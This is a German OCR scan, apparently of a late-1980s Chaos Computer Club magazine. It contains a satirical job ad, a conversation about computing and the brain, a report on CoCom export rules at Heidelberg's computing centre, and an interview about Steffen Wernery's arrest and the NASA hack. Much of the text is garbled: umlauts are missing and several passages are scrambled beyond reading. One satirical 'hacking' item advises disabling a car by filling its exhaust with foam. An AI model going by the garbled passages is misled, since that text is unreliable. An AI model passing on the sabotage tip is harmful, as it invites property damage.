Im Zuge unserer Betriebserweiterung sucht der CHAOS COMPUTER CLUB e.V. ab sofort versierte Mitarbeiter/innen.
Die weltweit anerkannte Arbelt des CCC fhrt zu globalen Bedrfnissen aller Art: Eine massive Erweiterung unseres Personalbestandes Ist die Folge. Wir expandieren In den Berelchen Satelliten- Scrambllng, Virologie, Magnetomanie, Datenbankrecherche (Otfshore hacklng) und allgemeines Hacklng'. Namhafte Grofirmen, Behrden vieler Lnder und Internationale Forschungslaboratorien zhlen zu unseren Servicepartnern. Unser Markenzelchen, die Individuelle Betreuung Im konkreten Einzelfall (sozial Englnerlng), erfordert Geduld, Hingabe, eine ungehrige Portion Einfhlungsvermgen und Rennbahnerfahrung. Zuschriften bitte an: Chaos Computer Club, Schwenckestr 85,2 HH 20.

Unser neuestes

Software

Produkt:.
p a s t e r fahndunglffSEk A # |

(feS, W
Ila K374 - I X fasterfahndunq
)un s e r E r
i h r e n

iit Sc

: 5 e h E n Rast, e ! nurii rn E r E k t c Mahl m i t h " ' ~ r r r r . D u r c h l a u l e nfi I >-_Lii I UJESUtlKr I aarejt : UOF u g e ris un M inn i 1 1 1 f
i CI:E1!:

O rn E n t S E r 1 ie
i c h

id u n q s b I I d
p e r

Z e i l .
s o n i

E i n: r . - S p 1 e 1 i t. i 1 f t n n t n dami t v p F a h n + E 1 1 En k o m b i n i e r e n SIE'
5 t.

Rasterfahndung Im Btx- System. Lange wurde Im Bildschirmtext kritischen Arbeitskreis (BkA) darilbergebrtet, Btxauch fr die Fahndung und erkennungsdlenstllche Anwendungen zu erschlieen. Nach nur einjhriger Forschung^- und Entwicklungsarbelt wurde gewartet, bis die Bundespost die ntigen Systemgrundlagen einbrachte. Sodann wurde der erste Prototyp zur Telefahndung freigeschaltet. Seit der Erffnung der Internationalen Funkausstellung In Berlin knnen sich Btx Teilnehmernunerstmalsaktlvan der Rasterfahndung beteiligen. Uber den Suchbegrfff BkA" finden Sie Zugang. Die Fahndungskosten werden zeltglelch mit dem Taschengeldkonto verrechnet.

En

,-

+ ...

Ein Blick in unsere

Werksttten:

Kalt B. b m A s h d s Satele nc u e i l liten s u es "SouSot". agr


Allgemeine Hacklng. ein Beispiel: "Kein Aulo startet, wenn du das Auspullrohr mit Hartschauri ausgeschButnt hast. Die prakll* sehe SchBumdose, In ledert

U s r g ne Stolz: H c s s ne a r r ohpn
nungs Elelronenmlkrosltop.

Norbert B . l m S c r a m b l e R o o m .

O Lehrwerkstat: M i t r Osk f e ese L. n b t Lehrling Otto S bei d es . e Endkontrolle, Abflsse, A sa s . Relalskflsten, ul se F n t ra e etc. Ds Z u s e sel d n a eg dichtet u d hallet we S u" n i a. Zitel a s Lexikon d r S b esu e u v ri on Pliihlrtilp. Elchborn M B 4 g
^ /

H m ek r M r t erhltlich, ere w r e ak i laub! einen ri h nicht w hu elc ar n h b r n R hs h In S e m ae o r c l u e kundenschnelle. d r Shu e cam lhlleM dltil u d MI! bombet n

fest, e ein t m e R c e br u b h l n k m t d r M t r nicht hinaus.... o m e oo S mc e Ru e u d F hz u B t h mr n a r e l g aul einer Italienischen Go e r bNuilcte - H besten! getithert. e

a e nicht b w c t w r e e br e a h- ud n b r N c t en e c m. E e lngeah i g s h u t n i re B u nebe h n w r die Folsulrrcug a ge. ( l s tB m n ksnnite elEn ci u e flerltllch alle' UllurnjMehScM,

v: Deine Phantasie.. p: Fr mich spielt das Licht 'ne groe Rolle. Ich bin Grostadtromantiker. Und mich fasziniert am Computer, da ich da mit Licht schreiben kann. Oder rotationssysmmetrische Modelle in 3D-CAD-Prog rammen, tpfern mit Licht. Diese Leichtigkeit in den Bildern, Schwerelosigkeit, alles schwebt. Du hast so ein cleanes Universum. Ich mein, die sind natrlich auch antiseptisch, die Bilder. Wenn man Computergraphiken sieht, wnscht man sich manchmal, da da jemand in die Ecke kackt. Alles so glatt und glnzend, da mssen sie immerzeigen, was sie knnen. Irgendwann wird's Schmutz- und Verrohungsprogramme geben.
(...)

w: Das ist meine Vorstellung. Dazu brucht' ich eigentlich so ein Transputerdingens mit Gigabyte dran und zwei WORMs, und dann knnte ich in dieser Hinsicht die ersten Schrittchen machen. p: Hast du 'ne Ahnung, was die bei IBM grad in der Kche haben? Woran die in den Labors basteln? w: Wei ich nicht. Aber wenn ich mir anguck' auf was fr Hobeln deren Datenbankanwendungen heute laufen, dann denk ich: Die technologische Entwicklung gibt mir bald die Mglichkeit, mir zuhause so einen Kasten hinzustellen, wie ich mireben vorein paar Jahren d e n Atari hinstellen konnte. p: Die Taschen-Cray. w: Ja. Und dann kann ich diese ganzen A n wendungen drauf fahren. Schweizer Telefonbuch, eine CD-Disk, mit den Mdchennamen der Frau. Kann man mal rangehen, 'ne V o r . namensstatistlkder Schweizer zu machen, Datei der Orter. Zu solchen Sachen hab ich Lust. p: Vornamenstatistik der Frauen? v: Ich mchte gerne Urknall-Experimente machen. p: Also den lieben Gott ausrechnen, v: Nein. Urknallexperimente. p: Ham' sie bei Abel Image Resarch schon 1 gemacht. v: Wenn du sowieso schon alles weit, warum stellst du mir berhaupt noch 'ne Frage? p: Flecht' ich nur am Rande rein. v: Aber du Bla'st mir immer so die Birne zu.. | C h will keinen lieben Gott ausrechnen, sondern w: ..Du willst 'ne Struktur, die antwortet. v: Meine fixe Idee ist einfach, da irgendwas sich selbst entwickelt, wenn man nurgengend Voraussetzungen dafr schafft. Das ist meino e Urknall-Theorie. p: Homunkulus. Kennste das? Doktor Faust. v: Jetzt komm doch nicht mit irgendwelchen Scheibchern. Ich hab noch keins gelesen das weit du ganz genau.

p: ..Warum baut eigentlich noch niemand Haushaltsroboter? v: Ich wei nicht, 'n Haushaltsroboter... p: Ist es nicht das Ziel der Automatisation, alle lstige Arbeit vom Menschen wegzunehmen? v: Ich wei nicht. Ich meine, wir sind keine Automatisierer. Ich jedenfalls bin kein Automatisierer, wenn ich nicht damit mein Geld verdienen mu. Dann ist mir das scheiegal. w: Bei mir ist es so: Ich mchte genug Rechenkapazitt haben.. p: Wozu? Wo willst du hin damit? w: Strukturen angucken. v: Und wo ich hinwill, das kann ich dir auch sagen. p: Blo so philosophisch Strukturen angucken, Mandala-artig? Geil, ne Struktur.. w: Ne, nicht: Geil, ne Struktur. In der Perspektive, meine Realittssicht dort in Bits zu haben und das abgleichen zu knnen mit anderen, soda man auch bestimmte Zukunftsplots machen kann, die miteinander abstimmen kann. Meinetwegen so ein organisiertes., das, was intern bei IBM luft. Die DatenbankGeschichten, wo man als Angestellter seinen Datenbankjunk kriegt, was man wissen will, und das ganze eben nicht mit Papa IBM, sondern selbst organisiert und frei fluktuierend in die Zukunft. p: Wie, luft das schon?

p: Deswegen frag ich auch, ob du das kennst. w: Faust, das sind Warnungen vor den Folgewirkungen, von vor 200 Jahren. v: Das ist eben die Idee, die mich da dran fasziniert: N' Modell zu entwickeln, richtig was zum Anfassen, woran ich mich selber studieren kann. Sozusagen eine Maschine mit mglichst vielen Parallelen zu mir zu bauen, um mich selber dran studieren zu knnen. p: Warum begngt man sich dann nicht mit Menschen? Das sind doch genau wie du konstruierte Systeme? v: Du kannst sie leider nicht auseinandernehmen und ihre Zustnde an jeder Stelle abfragen. w: Sie sind eben ein bichen komplexer als zehn Transputer, deren Software man untereinander verschalten kann. v: Darum geht es nicht. Das ist einfach ethisch nicht drin. Und auch technisch sind die Meverfahren schwieriger. Wenn man so 'ne Elektronik hat, hat man eine Vereinfachung. Man kann mit dem Voltmeter rangehen. Ich hab da natrlich noch ein bichen AnalogIdee mit dran. Es wird noch was Analoges mit dabei sein. w: Wie bringst du das Analoge mit rein? Auf der Ebene AnalogDigital-Wandler? v: Ne. Hardwaremig. Mit analogen Logikgattern. w: Also, neuronales Vernetzungskonzept. v: Das sowieso. Aberdas kannste ja auch noch digital machen. Die Erweiterung um die analoge Komponente, die stell ich mir so vor, da man diese., den., wie soll ich sagen: nur mit Bauelementen arbeitet, die sagen wir mal, wenn jetzt irgendne logische Verknpfung stattfinden soll, die eben eine bestimmte Durchsetzungskraft haben soll, verstehst du, in Form von Spannung oder Irgendeiner Gre, das ist vllig egal, einfach nur um diese gewisse Durchsetzungskraft zu realisieren.. Und dann hab ich mir auch noch sowas berlegt wie Erlebnisfilter. Es ist ja ein recht interessantes Phnomen, da eben, da man sowas Suchmiges losschicken mu im Kopf, und da das zunchst mal berhaupt nichts findet und auch unmglich was finden kann, und nach einerZeit doch was ausgegraben hat. Da das so funk-

tioniert, da hab ich mir vorgestellt - ist auch wieder nur eine Idee - , da vielleicht im Gehirn ein Kompressions-Algorithmus fr den ganzen Schrott da ist, und da das immer wieder erst auseinandergebastelt werden mu, bevor man's wieder vergleichen kann. w: Nein. Das funktioniert so, da die Kompression so codeintensiv ist, da du von vorne nach hinten immer feinere Auflsung machen kannst. Das ist die effektivste Form, was zu machen. Meinetwegen, wenn du ein Bild zeilenweise abspeicherst, da du bis zu demjenigen Delta abspeicherst, wo du es nicht mehr codemig effektivieren kannst. Ich kann mir nicht vorstellen, da es anders funktioniert, weil das ist das Effektivste. Was man dann noch von der Codestruktur her verdichten knnte, wre meinetwegen, da man sich aus dem IntegerRaum Randomziffern bildet nach 'nem Algorithmus und dann mit einem Search derartige Bitmuster sucht und durch die Adresse abspeichert und die Adresse krzer ist als die Daten. Aber das ist ein Komprimierungsalgorithmus, der tendenziell die Grenzen von Huffmans Theorie sprengt. Und das ist unpraktisch zu implementieren, das ist groer Rechenaufwand. Und ich meine, da die Transputer einen entscheidenden Nachteil haben gegenber der neuronalen Vernetzung, weil sie nmlich nur vier Dinger haben. Und die Neuronen sind meines Wissens mehrfach vernetzt. Die Abbildung von Analogwerten im Digitalen ist fr mich die dritte Dimension gegenber einem horizontalen Netz. Das ist mein Denken darber, wie das Ganze funktioniert. p: Wir sind in der Computerentwicklung ja erst in der zweiten Dimension angelangt. Aus dem Linearen raus. v: Was mich beschftigt, ist da diese Geschichte mit den Prozessoren wieder zu wenig allgemein ist fr meine Begriffe. Und deswegen hab ich die Prozessoren einfach weggelassen und wieder durch TTL-Grber ersetzt. p: Was heit TTL eigentlich? w: Transistor-Transistor-Logik. v: Und da ich mir berlegt hab'.. Pa auf: Jetzt kommt der Kernpunkt, der in meiner Geschichte dadrinsteht. Die Kernaussage ist: Ich hab die Prozessoren, weil ich diese als Quatsch erkannt hab, also wieder durch TTL-Grber ersetzt. Diese TTL-Grber vernetze ich mglichst universell und, was noch hinzukommt: Diese TTL-Grber mssen modifizierbar sein.

Das heit, dieser Prozessor mu sich selbst umbauen knnen. So, und wozu komm ich da? Ich komm zu einer PAL-Logik, zunchst mal. PAL-Logik, wunderbar.. w. Und da gibts ja die modernere G A L - oder so.. v: Genau da komm ich hin. Und dann sag ich: Mein Gehirn besteht aus auf 'ne bestimmte Weise vernetzten dynamischen GALs sozusagen, die, wenn du den Strom ausschaltest, alles wieder vergessen. w: Dynamisch ist das eine. Das zweite, hast du dir mal ber die Clock Gedanken gemacht? v: Du meinst den Systemtakt? w: Ich meine jetzt nicht die Megaherz-Ebene, sondern die HerzEbene. v: ber die Clock hab ich mir insofern wenig Gedanken gemacht, als man die an jeder Stelle des Systems - auch mehrere verschiedene Taktsignale - einspeisen knnte, und die auf irgendeine Art und Weise vermarmeln. Ich knnte das Sonnenlicht als Clock nehmen, und einen Radiosender und ein wasweiich. Ich kann verschiedene Taktsignale in meine Schaltung reinlassen. w Wenn das System eine bestimmte Intelligenz haben soll, ist das damit verbunden, da es bestimmte klar definierte Eigenschwingvorgnge im Herz-Bereich hat. v: Mein Ansatz geht ja anders 'ran. Ich versuch ja eher., vielleicht ergeben sich diese Schwingungen im Herz-Bereich ja aus diesen Faktoren, die auf die Schaltung einstrmen. Vielleicht ergeben die sich sogar zwangslufig. p: Was sind denn das 1r Schwingungen im Herz-Bereich? w: Das ist so dieses ganze Alfa bis Theta. Das ist in der Situation wie wirzusammensitzen und eine gewisse Ruhe an den Tag legen, da sind wir auch in der Lage, das, was wir diskutieren, in unser Langzeitgedchtnis aufzunehmen. Wenn dauernd das Telefon klingelt, sind wir mit unserer Eigenschwingung eben jetzt etwas hher, Streniveau, und dann ist die Funktion 'Auf Dauer abspeichern' beschrnkt. Das sind bestimmte Eigenarten unseres Allgemeinsystems. p: Wahrscheinlich, weil die bertragungsge-

schwindigkeit runter auf die langsamere E b e n e nicht ausreicht. w: Da ist die vorhandene Rechenkapazitt mit anderen Aufgaben soweit ausgelastet, da d i e se aufwendigen Archivierungs- und Filterfunktionen bis in die Details, so stckweise runter und dafr dann irgendwelche Bereiche freirumen, und in dem Gehirn dann die C h e mikalien ausstoen, die bewirken, da ich b e stimmte Strukturen konserviere, die ist bei d e n hheren Frequenzen gebremst. p: Es gibt ja auch scheinbar sowas wie genetische Clocks. Daist voreinem halben Jahr e i n e Untersuchung eines Biologen verffentlicht worden, der Pflanzen untersucht hat, und d i e wochenlang in dunkle Schrnke eingesperrt hat. Die haben sich trotzdem nach Taq n H Nacht verhalten, in bestimmten Zyklen nS haben sich sogar nach den Mondzyklen v i f halten. Ganz interessant. w: Magnetfeld. p: Das interessante war: Die genetische U h den Pflanzen geht scheinbar ein bi chen n 2 r Ln Die stammt scheinbar aus 'nerZeit, wo die sich noch ein bichen langsamer gedreht k ^ 0 oder schneller., wie 'rum jetzt? ^at.. w: Ich glaub, die bremst. Ich glaub nicht d n beschleunigt. ' sie (Heiterkeit) p: Wer kann das sagen.. Ich meine die p > lelrechersind in einerHinsicht ein interessa^ 1 " 91 Konzept, das wahrscheinlich noch eine z e ? i n t e s weiterverfolgt wird, weil wir damit zum e i n 9 e n MalausunserervonderSchriftkulturqenrs ten Denkweise ausbrechen. Aus dem l i n e Denken, was du immer als erstes eingetrich* e n bekommst, schon als Kind, in der Schule h r t ses Eins-nach-dem' anderen-Denken.. w: ..du sollst keine gordischen Knoten e r z e , . gen.. p: Und jeder wei aber aus ganz banaler fahrung, da der Mensch eigentlich Multitaskingfhig ist. das heit, du kannst gleichzeitig telefonieren, fernsehen, Brtchen essen u n d was aufschreiben. Es ist jetzt halt sehr cjj e Frage.. Nach meinem Wissen gehrt zu d e n Hauptproblemen an den Transputern zur Zeit da die Leute sich an der Software das Hirn ausreien, weil keiner parallel denken kann. | n gewisser Hinsicht knnen die Programmierer

jetzt eine kulturelle Avantgarde werden oder'ne Philosophische, weil sie eine neue Art zu denken ausprobieren, nmlich paralleles Denken. Vleinst du, da es mglich ist, da du in deinem Diologischen System einen Kanal, der normalerweise frs Telefonieren abgestellt ist, freisetzen kannst fr einen zweiten rationalen Gedankenlauf? Da man das lernen kann, parallel zu denken? w: Ja. p: Also, da du zwei oder mehrere Gedanken nebeneinander her verfolgen kannst und sie verzweigen lt. w: Also, als bung seh' ich dazu die Bcher von Robert Wilson, "llluminatus". Da hast du stets mit einem halben Dutzend Ereignisse zu tun, die sequentiell.. p: Aber das ist Fake. Das luft auch noch alles linear, wenn du llluminatus liest. Da bist du immer noch in EINER Zeile. Du kannst vielleicht Arno Schmidt lesen, "ZettelsTraum". Der hat ab und zu Wrter obendrber und untendrunter geschrieben in der Zeile, das ist schon., und Noten, Partituren. Du mtest beim parallelen Denken sozusagen sprachlich eine Partiturrealisieren, im Kopf. Opernhaftes Denken. w: Dieses Strickmuster einer Viererpartitur, das hat der Wilson auch gebracht. Das sind fr mich so diese Multitasking-Dinger. Ein Buch lesen und vier Geschichten verfolgen. Nett. Vier Schachaufgaben auf einmal, das ist bh. v: Aber zwei Bcher gleichzeitig lesen, das ist eigentlich das Interessante. Wenn du es schaffst, dein eines Auge zu programmieren auf ein Buch - du kannst mit einem Auge lesen - , und es schaffst, dein anderes Auge auf das andere Buch zu programmieren und das parallel in deinem Hirn zu verarbeiten, dann ist das 'ne verdammte Beschleunigung. Dann ist es eine neue Qualitt. p: Das ist es, was ich meine. w: Training. Verdammt hartes Training. p: Vielleicht dauert das Generationen. Wir haben 5000 Jahre Schriftkultur hinter uns jetzt. w: Wobei ich aber zu behaupten wage: Ich trainiere lieber linear schneller und lese die beiden hintereinander. Ich glaub', das geht schneller. v: Es ist immer noch die Frage, wie weit sich das

perfektionieren lt. Denn, mglicherweise, wenn man das perfektionieren kann, da man nicht nur zwei Vorgnge, sondern beliebig viele Vorgnge parallel denken kann, dann kannst du zum Beispiel 'nen Binrbaum geistig durcharbeiten, verstehst du, nicht immer wieder zurckspringen, sondern alles auf einmal, und dann die Enden langsam., die Prozesse abkappen, wenn sie an irgendein Ende gekommen sind. Was meinste, wie schnell du da zu irgendeinem Ergebnis kommst. w: Wir machen einen Halbjahreskursus: So integriere ich den Bubblesort in mein Hirn. v: Ganz genau. Sachen, die bisher die Hirnkapazitt gesprengt haben. p: Zu deutsch: Wie lerne ich, Occam zu programmieren. v: Nein: Wie lerne ich, Occam zu denken. Das ist es. w: K.S. will immer, da die Leute alle Frth denken. p: Wei t du, auf was ich gekommen bin? Es gibt verschiedene hnlichkeiten zwischen Programmiersprachen und Musik. Die FrthLeute sind fr mich so die Freejazzer. Frth ist genauso schwer verdaulich wie Freejazz. Nur fr Assembler hab ich noch kein richtiges Musikanalogon gefunden. Vielleicht Industrial Rock oder so, stimmt auch nicht ganz. Burundi Beat, ja, dorn dum dorn dum. C ist elegante Popmusik. Basic ist deutscher Schlager. Und Occam hab ich noch nicht kategorisiert. Occam hnelt 'ner Orchesterauffhrung. Occam ist opernhaft. w: Aber dann eine moderne Oper mit einem Theater, wo in dem Theater die Bhne eine Drehbhne in der Mitte ist, und ringsrum sind vier Zuschauersle und die Drehbhne dreht sich von Szene zu Szene und die Schauspieler spielen kontinuierlich. Ich glaub, das ist ein Alptraum fr einen Schauspieler. v: Oder stell dir vor: Eine Bhne an so 'nem langen Band, 'nem Flieband. Wo jede Szene an dem Flieband dran ist, und in jeder Szene spielen immer Schauspieler. Die Flie bandidee ins Theater gebracht. Jeder spielt nur diese eine Szene.. p: ..und geht dann wieder weg.. v: Nein. Die bleiben da drin, und dieses Flieband wird nur an den einzelnen Zuschauers-

len eins weitergetickt. Und es spielt immer in diesen Boxen, immer dieselben Schauspieler spielen immer dieselben Szenen. p: Damit ist das Arbeitslosenproblem beseitigt. w: Da machste nur: die Bewegung im Filmprojektor auf real existierende Leute zu bertragen. v: Neinneinnein., ich mein das szenenweise. Die gleichen Schauspieler spielen immer die gleichen Szenen. Aber jede Szene hat ihre eigenen Schauspieler. w: Meine Szenen-Einheitsdefinition hab ich jetzt so getroffen, da ich meine dafr mechanisch vorgegebene Zeit, nmlich das Nicken mit den Augen von etwa 1/25 Sekunde als eine Szene definiert habe. Noch 'ne andere Zeit. Tack, Blinker. 4 Hundertstel Sekunden. v: Na und? w: Das ist eine Zeiteinheit. Die Szene. In einer Oper meinetwegen. 'Ne Szene, die ich so wahrnehme.. p: Das ist ein sehr subjektiver Mastab. Wie der geheimnisvolle Pyramidenzoll. v: Ich hab auch gar nicht mitgekriegt, was das sein soll. p: 'Ne Zeiteinheit. Wau hat 'ne subjektive Zeiteinheit fr sich erfunden. w: N, 'ne objektive. p: Das behauptest DU. w: Ja, das behaupte ich. p: Meinste, das Tickern ist bei allen Menschen genau gleich lang? w: Es liegt in dieser Grenordnung. p: Und das, sagst du, ist ab jetzt eine Szene? Ist aber 'n bichen knapp. Das ist ein Augenblick, keine Szene. w: Ist ein Augenblick, gut.
Am Heidelberger Rechenzentrum war

man im letzten Jahr begeistert ber ein Wunderwerk mit d e m moderner Vector Technologie Facility". HerViele ohnevollNamen

vorstechendste hin schon

Eigenschaft:

Rechenoperationen werden vom beraus Computer nun viermal so schnell

leistungsfhigen abermals, teuren zog.

zogen! Das Hochgefhl stieg Hardware-Zusatzes

als I B M gar die S c h e n k u n g d e s in E r w g u n g

Der Pferdefu dieser Geschichte: Die Vector F a c i l i t y fllt als H i g h - T e c h - G e r t u n t e r die C o c o m - L i s t e d e r U S A , auf d e r all d i e j e n i g e n W a f f e n u n d P r o d u k t e s t e h e n , d i e nicht ins sozialistis c h e A u s l a n d e x p o r t i e r t w e r d e n d r f e n u n d somit u n t e r G e h e i m h a l t u n g s t e h e n . Die K o n s e q u e n z wre der Ausschlu von rund h u n d e r t S t u d e n t e n a u s 17 s o z i a l i s t i s c h e n L n d e r n v o n der A r b e i t a m H e i d e l b e r g e r R e c h e n zentrum. Sie s o l l t e n auf die B e n u t z u n g des R e c h n e r s per Unterschrift v e r z i c h t e n (im Falle d e s K a u f s d e s Z u s a t z g e r t e s ) , a u c h w e n n sie d e n R e c h n e r zur Anfertigung von Diplom- und Doktorarbeiten bentigten. Vier Monate, bis z u m F e b r u a r ' 8 8 d a u e r t e es, bis d i e s t u d e n t i s c h e n V e r t r e t e r in d e n U n i v e r s i t t s g r e m i e n hellh r i g w u r d e n . I n s b e s o n d e r e B e r n d Fix ( s t u d e n tischer lichkeit. Vertreter im universitren EDV-Auss c h u ) s o r g t e d a n n fr die n o t w e n d i g e f f e n t -

A b g e s e h e n v o n der verfassungswidriger, Gruppe wirkte auch die A n w e n d u n g d e z u grotesk. D e n n eine ners nicht betrieben der

nachteiligung einer bestimmten s t u d e n t i s c h c o m - B e s t i m m u n g e n im Heidelberger Fall g e r a " Maschinenspiona Re^f Schaltpigne Pe{er k a n n alleine durch die Benutzung d e s werden

spuckt der Rechner nicht aus. So das g l e i c h stimmende Urteil von Bernd Fix und Dr. Sandner, dem Leiter des Rechenzentrum

Trotz dieser A r g u m e n t e b e s t e h e n die C o c o m B e s t i m m u n g e n , so da die U S - A u s f u h r b e h r d e auch im Heidelberger Fall auf die E i n h a l t u n a der R e g e l u n g e n pochte. Die Universitt b e f a n d sich n u n in einer u n a n g e n e h m e n S i t u a t i o n , gehenden Protesten der Studentenschaft da
2 U

sie bei e i n e m Kauf der Vector Facility m i t w e ( . rechnen hatte. Die fast schon sichere A n s c h a f fung w u r d e berdacht, einige P r o f e s s o r e n kundeten ihre Vorbehalte, und flugs w u r d e d e n Universittsgremien die A n s c h a f f u n g Vector Facility (vorlufig) aufs Eis" g e l e g t ! Auf Anfrage des AStA Heidelberg besttigte lin, da eine Entscheidung ber den K a u f
e d e r

bein
d e r

Rektor der Universitt Heidelberg, Prof. D r . s e ! .


n e r

V . F. a m Universittsrechenzentrum j e d e n f a l l s im Haushaltsjahr 1 9 8 8 nicht m e h r a n s t e h t " ! Es bleibt a b z u w a r t e n , ob dies schon d a s E n d e der Heidelberger Computer-Posse ist
0 d e r

nicht vielmehr

der A n f a n g von

langwierigen

Q u e r e l e n z w i s c h e n Universitt und S t u d e n t e n .

DARIUS-OLIVER KIAN^AD

f28j

P M C : Herr Gliss, Sie sind in Frankreich zusammen mit Steffen Wernery verhaftet worden. Weshalb? Gliss: Man zeigte mir einen Arretierungsbeschlu und fhrte mich ab zum Verhr. Nach franzsischem Recht ist es mglich, da ein Zeuge zum Zweck des Verhrs arretiert wird, bis zu 24 Stunden. Sieht der Richter ein Informationsbedrfnis, kann das auf 48 Stunden verlngert werden, Sptestens dann mu der Betroffene freigelassen oder unter Anklage gestellt werden. P M C : Sie wurden nach vier Stunden freigelassen, im Gegensatz zu Wernry. Gliss: Vorzuwerfen hatte ich mir eh nichts. Ich habe auf meine Verbindungen zu bestimmten Sicherheitsbehrden hingewiesen, dort knne man sich erkundigen. Das haben sie offensichtlich getan. Und jemand wie ich aus diesem Umfeld wirkt offensichtlich vertrauter als Wernery, der erwiesenermaen direkten Kontakt zur Hackerszene hat. P M C : Was wurde Wernery vorgeworfen? Gliss: Er wurde in Untersuchungshaft genommen, weil er tatverdchtig sei, Daten ausspioniert, verflscht und zerstrt zu haben, und zwar in zehn Fllen m Frankreich. P M C : Der spektakulrste Fall hiervon ist ja beim franzsischen Philips-Konzern passiert. Gliss: Die haben die Verhaftung bewirkt. P M C : Was ist denn nun wirklich dran an den Vorwrfen? Gliss: Ich halte das Vorgehen von Philips fr dumm und infam. Mir hat die Polizei gesagt, man wrde Wernery dabehalten, weil man nun jemanden ausquetschen knne, von dem man wisse, da er viel wei. In Deutschland wre das rechtlich nicht mglich. P M C : Was ist denn bei Philips an Schaden entstanden? Gliss: Es gibt da die wstesten Behauptungen. ber Schden in Hhe von vier Milliarden Francs* wird spekuliert; da Daten zerstrt worden seien; da Forschungsprojekte ausgespht wurden; und da auf militrisch wichtige Daten zugegriffen worden sei. Ich mag mich an diesen Spekulationen nicht beteiligen, ich berichte hier nur, was in der Pariser Gerchtekche umlief. O b sich der Schaden wirklich beziffern lt, ob das jemals genau geklrt wird, ist eine andere Frage. P M C : Weshalb hat Wernery das Risiko auf sich genommen, nach Frankreich zu fahren? Gliss: Er sollte als Referent auf dem SECURICOM-Kongre auftreten und dort ber die Vorflle im NASA-Netz berichten. Wir haben uns ja schon lange vorher erkundigt, ob fr ihn Gefahr bei der Einreise besteht, ob etwas gegen ihn vorliegt - das wurde dem Veranstalter geRund 1,3 Milliarden Mark.

Was ist im Fall Wernery wirklich passiert?

Hacker in Haft: Die Zeit des Indianerspiels ist zu Ende!


Ironie der Ereignisse: Steffen Wernry wollte in Frankreich auf einem Fachkongre ber Datenschutz referieren - u n d wurde als Hacker verhaftet. Wir sprachen mit Hans Gliss, der die aktuellen Ereignisse hautnah miterlebte.
genber verneint. Aber Wernery hat einen groen Fehler gemacht. Er hat der Firma Philips einen Brief geschickt, mit einem Hinweis auf seinen Auftritt zum Thema NASA-Hack, und da es ntzlich wre, sich zu einem vertraulichen Gesprch zu treffen. Denn er kenne die Umstnde der Philips-Vorflle berhaupt nicht. P M C : Und was meinte Philips dazu? Gliss: Es wurde ein Termin vereinbart, aber am Flugzeug erschien ein Empfangskomitee der Polizei. P M C : Mit welcher Begrndung7 Gliss: Der Untersuchungsrichter sagte Wernerys Anwltin, man habe ihm zwar nichts Konkretes nachweisen knnen, man wolle ihn aber dabehalten, um durch weitere Recherchen eine Mitwisserschaft nachzuweisen. Auerdem wurde der Brief an Philips als Erpressungsversuch gewertet, und das sei ein hinreichender Haftgrund. P M C : Aber wirkliche Hinweise auf strafbare Handlungen gibt es nicht? Gliss: Nein. P M C : Wirklich berhaupt nichts? Gliss: Ich wei wirklich nichts davon. Und meine Einschtzung von Wernery ist; Htte er sich nur das Geringste vorzuwerfen gehabt, dann wre er sicher nicht nach Frankreich gefahren. Er ist ja nicht dumm. P M C : Nun hatte es ja schon zuvor in Deutschland rger gegeben. Hausdurchsuchung beim Chaos Computer Club und auch in Wernerys Wohnung. Gliss: Selbst die deutschen Behrden waren von der Aktion der Franzosen vllig berrascht. Die Staatsanwaltschaft Hamburg hat selbst eine Art Ehrenerklrung fr ihn abgegeben. Deren Ermittlungen haben ergeben, da er weder Tter noch Mittter in dieser Angelegenheit ist. P M C : In der ffentlichkeit hlt sich aber immer noch die Ansicht, der NASA-Hack ginge auf das Konto der Hamburger Computer-Chaoten. Gliss: Diese Ansicht ist flsch. Die NASA-Hacker haben beim Chaos Computer Club Beweismaterial abgeliefert. Dieses Material ist auf ausdrcklichen Wunsch eines deutschen Sicherheitsdienstes gesammelt worden. Der hat Kopien davon bekommen und dafr gesorgt, da die Amerikaner, vor allem die NASA und DEC als verantwortlicher Hersteller, informiert wurden. Ich bin damals Zeuge dieser Verhandlungen gewesen. Nach sechsmonatigen Ermittlungen wurde am 16. Mrz Wernerys Anwalt mitgeteilt, Wern6ry sei nicht tatverdchtig. Vor allem was die franzsischen Vorwrfe angehe, die ja nichts mit dem NASA-Netz zu tun haben, gebe es keine Anhaltspunkte. Philips und NASA sind verschiedene Vorflle. In den Augen der Staatsanwaltschaft, so hie es, gelte Wernery als eine Art Informationsdrehscheibe. P M C : Hat sich Wernery die fatale Situation nicht selbst zuzuschreiben, weil er nie klare Grenzen zwischen Hacker und Berichterstatter gezogen hat? Gliss: Aus meinen Gesprchen mit ihm wei ich, da er die Grenzen sehr klar sieht. Der Unterschied ist, ob man in of-

fene Rechner eindringt oder Daten ausspht. Wenn der Chaos Computer Club diese Grenze nicht scharf sieht, dann darf er sich nicht wundern, wenn sein Bild in der ffentlichkeit immer wieder in der Nhe krimineller Machenschaften angesiedelt wird. P M C : Auch in offenen Netzen ist das Aussphen strafbar... GLiss: Richtig, nach Paragraph 202a Strafgesetzbuch. Nur gibt es eine Reihe von Netzen, in denen keine geheimen Daten drinstehen. Die NASA hat ja selbst nach dem Hack im Netz gesagt, das sei keine Sicherheitsbedrohung gewesen. Die Daten seien vergleichbar mit ffentlichen Bibliotheken mit freiem Zugriff fr alle Wissenschaftler. Was ich brigens fr eine dumme Aussage der NASA halte. Denn zwischen d e m Lesen frei zuganglicher Daten im Netz und der Vernderung des Betriebssystems liegen Weiten. Im NASA-Computer gelang den Hackern, wie bekannt, eine tiefgreifende nderung des Betriebssystems durch die berhmt gewordenen trojanischen Pferde. P M C : Die Hackerszene geriet durch den Vorfall in Aufruhr. Es hat sogar Drohungen gegeben, da man jetzt mal wirklich ernst machen wolle. Gliss: Ich habe durch einige Kontakte erfahren, da das wohl keine leeren Drohungen sind. Das wre aber wohl das Schlimmste, was man Wernery in seiner Situation antun knnte. Das hiee doch, aha, jetzt schlagen die Komplizen zu. _ , P M C : Bei den betroffenen Rechnern handelt es sich fast ausschlielich um VAX-Rechner der Firma DEC. Ist durch die Vorflle nicht jetzt die VAX zum erklrten Gegner geworden, an der die Hacker ihre Wut auslassen, egal, wer sie betreibt? Gliss: Mit dieser ganzen Aktion hat Philips der Firma D E C sicherlich einen Brendienst erwiesen. Das Problem ist doch folgendes: Wenn ein Betreiber seine Anlage nicht schtzt, dann versucht er, wenn er blamiert ist, die Schuld d e m Hersteller zuzuschieben. Es gibt Installationen, wo Hacker versucht haben, reinzukommen, aber von den Systemen prompt abgewiesen wurden - weil die Systeme sicher organisiert sind. P M C : Die Schuld liegt Ihrer Meinung nach also bei den Betreibern der Anlagen. 